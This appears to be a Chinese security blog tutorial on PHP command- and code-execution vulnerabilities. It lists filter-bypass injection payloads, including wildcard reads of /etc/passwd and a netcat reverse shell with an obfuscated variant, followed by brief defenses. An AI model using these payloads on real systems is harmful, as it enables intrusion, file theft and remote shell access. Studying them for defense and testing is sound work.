查看ip命令_命令执行与代码执行(Web漏洞及防御)

最新推荐文章于 2022-07-04 15:43:39 发布
最新推荐文章于 2022-07-04 15:43:39 发布
阅读量148 收藏
点赞数
文章标签: 查看ip命令
b429a0f1e41ea8d65381aa96a0f134a5.png

命令执行漏洞

应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或函数的参数被用户控制,就有可能通过命令连接符("&、|、||")将恶意命令拼接到正常的函数中,从而执行系统命令!

29613a3e454a9023e80fdced162e79cf.png

代码执行漏洞

应用程序提供了一些可以将字符串作为代码执行的函数,如果对这些函数的参数控制不严格,就有可能会被攻击者利用,执行恶意代码!

PHP中常见的命令执行函数

bb6761e1f1de8c66b5b94c98781013d9.png

PHP中常见的代码执行函数

6f26a2d7974569235629fbc584c0412b.png
9cc22c1e5879f4e621bd246ad926d320.png

注意:具体如何使用及实例,请参见之前的文章!

PHP危险代码

命令执行绕过

开发人员在开发的过程中,为了避免命令执行漏洞,可能会过滤一些命令!

${IFS}绕过:是shell的特殊环境变量,是Linux下的内部域分隔符,存储的值可以是空格、制表符、换行符或者其他自定义符号!

?ip=192.168.1.88;cat ${IFS} test.php// 可以查看test.php的源码!

$IFS$9绕过:用于空格过滤

?ip=192.168.1.88;cat ${IFS}$9 test.php// 可以查看test.php的源码!

制表符绕过

制表符的URL编码:%09,通过%09来代替空格,绕过空格过滤!

?ip=192.168.1.88;cat$09test.php// 可以查看test.php的源码!

{}绕过

绕过空格过滤

?ip=192.168.1.88;{cat$09test.php}// 可以查看test.php的源码!

绕过cat命令过滤

?ip=192.168.1.88;cat

变量拼接绕过

Linux支持变量赋值,通过变量拼接绕过!

?ip=192.168.1.88;a=c;b=at;$a$b test.php// 可以查看test.php的源码!

空变量绕过

?ip=192.168.1.88;ca${z}t test.php// 可以查看test.php的源码!

系统变量绕过

${SHELLOPTS}是系统变量,利用系统变量的字符拼接绕过过滤!

136885fd4a5eb8937c9d69db13709c2e.png 
?ip=192.168.1.88;${SHELLOPTS:3:1}at test.php// 可以查看test.php的源码!

绕过

?ip=192.168.1.88;ca test.php// 可以查看test.php的源码!

通配符绕过

*,?、[]

比如要查看/etc/passwd文件

cat /???/???sw?

shell反弹绕过

/bin/nc 192.168.1.88 6666 -e /bin/bash
192.168.1.88 转换为十进制:192x256的3次方+168x256的二次方+1x256+88x1=3232235864
/b??/?c 3232235864 8888 -e /???/b??h

Base64编码绕过

利用系统函数base64对命令进行Base64编码

// id命名对其进行Base64编码:aWQ=解码:base64 -d
`echo "aWQ=" | base64 -d`

expr和awk绕过

通过命令从其他文件中提取字符进行命令构造

test.txt的内容为:

tonywenxin

获取test.txt中的t字母:

expr substr $(awk NR=1 test) 1 1 // 1:位置(索引从1开始的) 1:个数
6e9beec43b8c4e6b850d4e8a9275ae95.png

无回显的命令执行

存在命令指定漏洞,并且执行此命名没有回显,可以通过shell反弹的方式将shell反弹到vps上,然后通过vps执行命令。如果无法反弹shell,也可以通过DNS管道解析的方式获取命令的执行结果!

2ba781e0531e578261e1426fa6251c0e.png
8803de178a011940e244c3c2df661c87.png
6b5d28e7016d1ac1377e031e431a71ff.png
18750f32f7eaab701126114979878e3e.png

命令执行漏洞防御

服务器配置修复

通过PHP配置文件中的disable_functions禁用敏感函数来修复命令执行漏洞!

函数过滤

escapeshellarg():把字符串转码为可以在shell命令里使用的参数,以过滤命令中的参数!

escapeshellcmd():对shell元字符进行转义,过滤命令!

代码执行漏洞防御

1b0d0acf21ea2dfbc87a7a12f7625e17.png
weixin_39560002
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cmd命令设置IP地址
11-16
在Windows 命令行下设置系统的IP地址 掩码,网关等参数
IP命令
猫瑾的博客
01-19 409
ip:show/manipulate routing, devices, policy routing and tunnels Linux的ip命令和ifconfig类似,但前者功能更强大,并旨在取代后者。使用ip命令能很轻松地执行一些网络管理任务。ifconfig是net-tools中已被废弃使用的一个命令,许多年前就已经没有维护了。iproute2套件里提供了许多增强功能的命令ip命令便是其...
命令执行漏洞漏洞原理,如何防御命令执行漏洞代码执行漏洞命令执行漏洞有什么区别?
DXfighting_的博客
04-14 1396
原理:程序应用有时需要调用一些执行系统命令的西数,如PHP中的system、exec、shell.exec,passthru、popensproc.popen等,当用户能控制这些西数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,命令执行漏洞产生的原因1.由手开发人员编写源码时,没有针对代码中可执行的特殊西数入口做过滤,导致客户端可以提交悉意构造语句,并提交服务端执行2.命令注入攻击中,web服务器没有过滤类似system、eval和exec等西数,是该漏洞攻击成功的主要原因 ..
sed 和awq常用指令
jiegedalao的博客
12-08 3万+
sed 和awq常用指令 操作 示例 含义解析 输出文本 sed ‘1p’ a.txt 或 sed -n ‘p’ a.txt 输出所有行,等同于cat a.txt sed -n ‘1p’ a.txt 输出第1行 sed -n ‘4p’ a.txt 输出第4行 sed -n ‘$p’ a.txt sed -n ‘5,$p’ a.txt 从第5行输出到最后一行 sed -n ‘4,7p’ a.txt 输出第4~7行 sed -n ‘4,+10p’ a.txt 输出第4行及其后的10行内容,共11行 sed
Linux | shell编程
ZEUS00456的专栏
04-10 926
INDEX§1 SHELL 是什么§2 语法§2.1 固定格式§2.2 变量§3 执行 §1 SHELL 是什么 shell 是一个命令行解释器,它为用户提供了一个向 Linux 内核发送请求以便云心程序的界面系统级成程序,用户可以用 SHELL 启动、挂起、停止、编写一些程序 §2 语法 §2.1 固定格式 以 #!/bin/bash 或 #!/bin/sh 开头 #! 不是注释,是一个特殊符号,用于指定 shell 脚本解释器的路径 通常,sh 会软连接至 bash,并开启 POSIX 标准模式
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
理解Windows命令执行漏洞的原理和攻击手段对于防御Web应用至关重要。开发者应确保对用户输入进行充分的验证和过滤,避免直接将用户可控的数据传递给系统命令。同时,系统管理员应定期更新和修补系统,以减少潜在的...
E046-服务漏洞利用及加固-利用structs2实现远程命令执行.pdf
12-02
本文将深入探讨一个安全漏洞的利用与加固,特别是如何利用Structs2框架中的漏洞实现远程命令执行。该课程以E046为主题,涵盖了网络安全领域的一个重要问题,即服务漏洞的利用和防御策略。我们将首先了解实验环境,...
Hacking_Oracle_From_Web_2.zip_WEB HACKING_oracle
09-20
这通常涉及到SQL注入、恶意脚本注入或其他Web漏洞,以及了解如何在Web应用层与数据库交互。以下是一些关键知识点: 1. **Web渗透测试**:这是安全测试的一种方法,通过模拟黑客攻击来发现系统漏洞。包括信息收集、...
信息安全_WEB流量监控防御系统.pptx
08-14
【网络安全】\n\n本文将深入探讨Web流量监控防御系统的工作原理、部署方式以及关键技术和实现原理,重点关注如何有效防止和应对网络安全威胁。该系统基于OWASP(开放式网络应用安全项目)理念,旨在确保Web应用的...
Python网络安全项目开发实战_防命令注入_编程案例解析实例详解课程教程.pdf
最新发布
04-27
【Python网络安全项目开发实战:防命令注入】 命令注入是一种常见的网络...学习如何防御命令注入是网络安全项目开发中的重要一环,尤其是对于使用Python进行Web开发的人员来说,理解和实践这些防御措施是至关重要的。
SHELL编程笔记
u013343882的博客
09-20 544
1 普通变量       略 2 系统专用变量 shell在初始化的时候会在执行profile等初始化脚本,脚本中定义了一些环境变量,这些变量会在创建子进程时传递给子进程。 用env命令可以查看当前的环境变量。常用的系统环境变量如下: _(下划线) 上一条命令的最后一个参数 变量名称 描述 $UID  展开为当前用...
Linux – AWK
qq_29168493的博客
01-30 296
AWK命令可以用来格式化报文或从一个大的文本文件中抽取数据包,它在文本浏览和数据的熟练使用上性能优异。   调用awk 有三种方式调用awk。 第一种是命令行方式:awk [-F field-separator] ‘commands’ input-file(s) 第二种方法是将所有awk命令插入一个文件,并使awk程序可执行,然后用awk命令解释器作为脚本的首行,以便通过键入脚本名称来调
linux shell教程、bash教程、shell脚本、bash脚本【教程】第九章:变量访问 内部变量(内建变量、位置参数、其他特殊参数)
Dontla的博客
07-04 807
原文:http://shouce.jb51.net/shell/第一章:Shell编程 第二章:Sha-Bang()开始第三章:特殊字符第四章. 变量和参数介绍第五章:引用与转义 第六章:退出和退出状态第七章:测试(if/then)、文件测试操作符、比较操作符(整数比较、字符串比较、混合比较)第八章:操作符(expr、let操作符、计算操作符、位操作符、逻辑操作符、逗号操作符、自定义进制BASE#NUMBER)影响Bash脚本行为的变量。 $BASH_ENV(Bash启动文件路径) 该环境变量保存一个,当启
PHP命令执行漏洞基础
笑花大王
02-02 2043
前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。 基本函数 1.system()用于执行外部程序,并且显示输出 <?php system('whoami'); ?> 2.exec()函数用于执行一个...
linux中的awk命令详解
热门推荐
jin's blog
01-14 11万+
1、AWK简介 AWK是一种处理文本文件的语言,是一个强大的文本分析工具。 2、AWK语法 awk [选项参数] 'script' var=value file(s) 或 awk [选项参数] -f scriptfile var=value file(s) 选项参数的说明: -F fs or –field-separator fs 指定输入文件折分隔符,fs是一个字符串
awk常用命令
天蓝
08-20 1872
awk命令详解 2009年03月31日 星期二 22:22 AWK指令详解 1. 命令简述: awk将每个输入行识别成一条记录,而将那一行上的每个单词域识别成一个字段 2. 命令选项:      -F                指定分隔符
awk if语句
xiyangyang052的专栏
05-03 7万+
awk命令以if结构开头的话句属于操作语句。条件模式(conditional pattern) 中。if是隐含的。而条件操作语句的if则是直接声明的,后面跟了一个用圆括号括起来的表达式。如果该表达式的运算结果为真(非0或非空),则执行表达式后的语句(或语句块)。如果跟在条件表达式后面的语句不止一条,就要用分号或换行符把它们隔开,还要用花括号把这一组语句都括起来,以作为一个块来被执行。 格式
awk学习笔记
weixin_34006965的博客
04-30 5096
不错的学习链接:所以拷贝下来了http://sebug.net/paper/books/awk/ awk是行处理器: 相比较屏幕处理的优点,在处理庞大文件时不会出现内存溢出或是处理缓慢的问题,通常用来格式化文本信息awk处理过程:依次对每一行进行处理,然后输出awk命令形式:awk [-F|-f|-v] ‘BEGIN{} //{command1; command2} END...
命令执行漏洞防御
jpygx123的博客
10-22 9498
命令执行: PHP:system、exec、shell_exec、passthru、popen、proc_popen等称为高危漏洞。 原理:只要程序可以调用系统命令的情况下都可以发生命令执行漏洞。 条件:用户能够控制函数输入,存在可以执行代码的危险函数。   命令执行漏洞产生原因: 开发人员没有对特殊函数入口做过滤,导致用户可以提交恶意代码并提交服务端执行Web服务器没有过滤危险...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值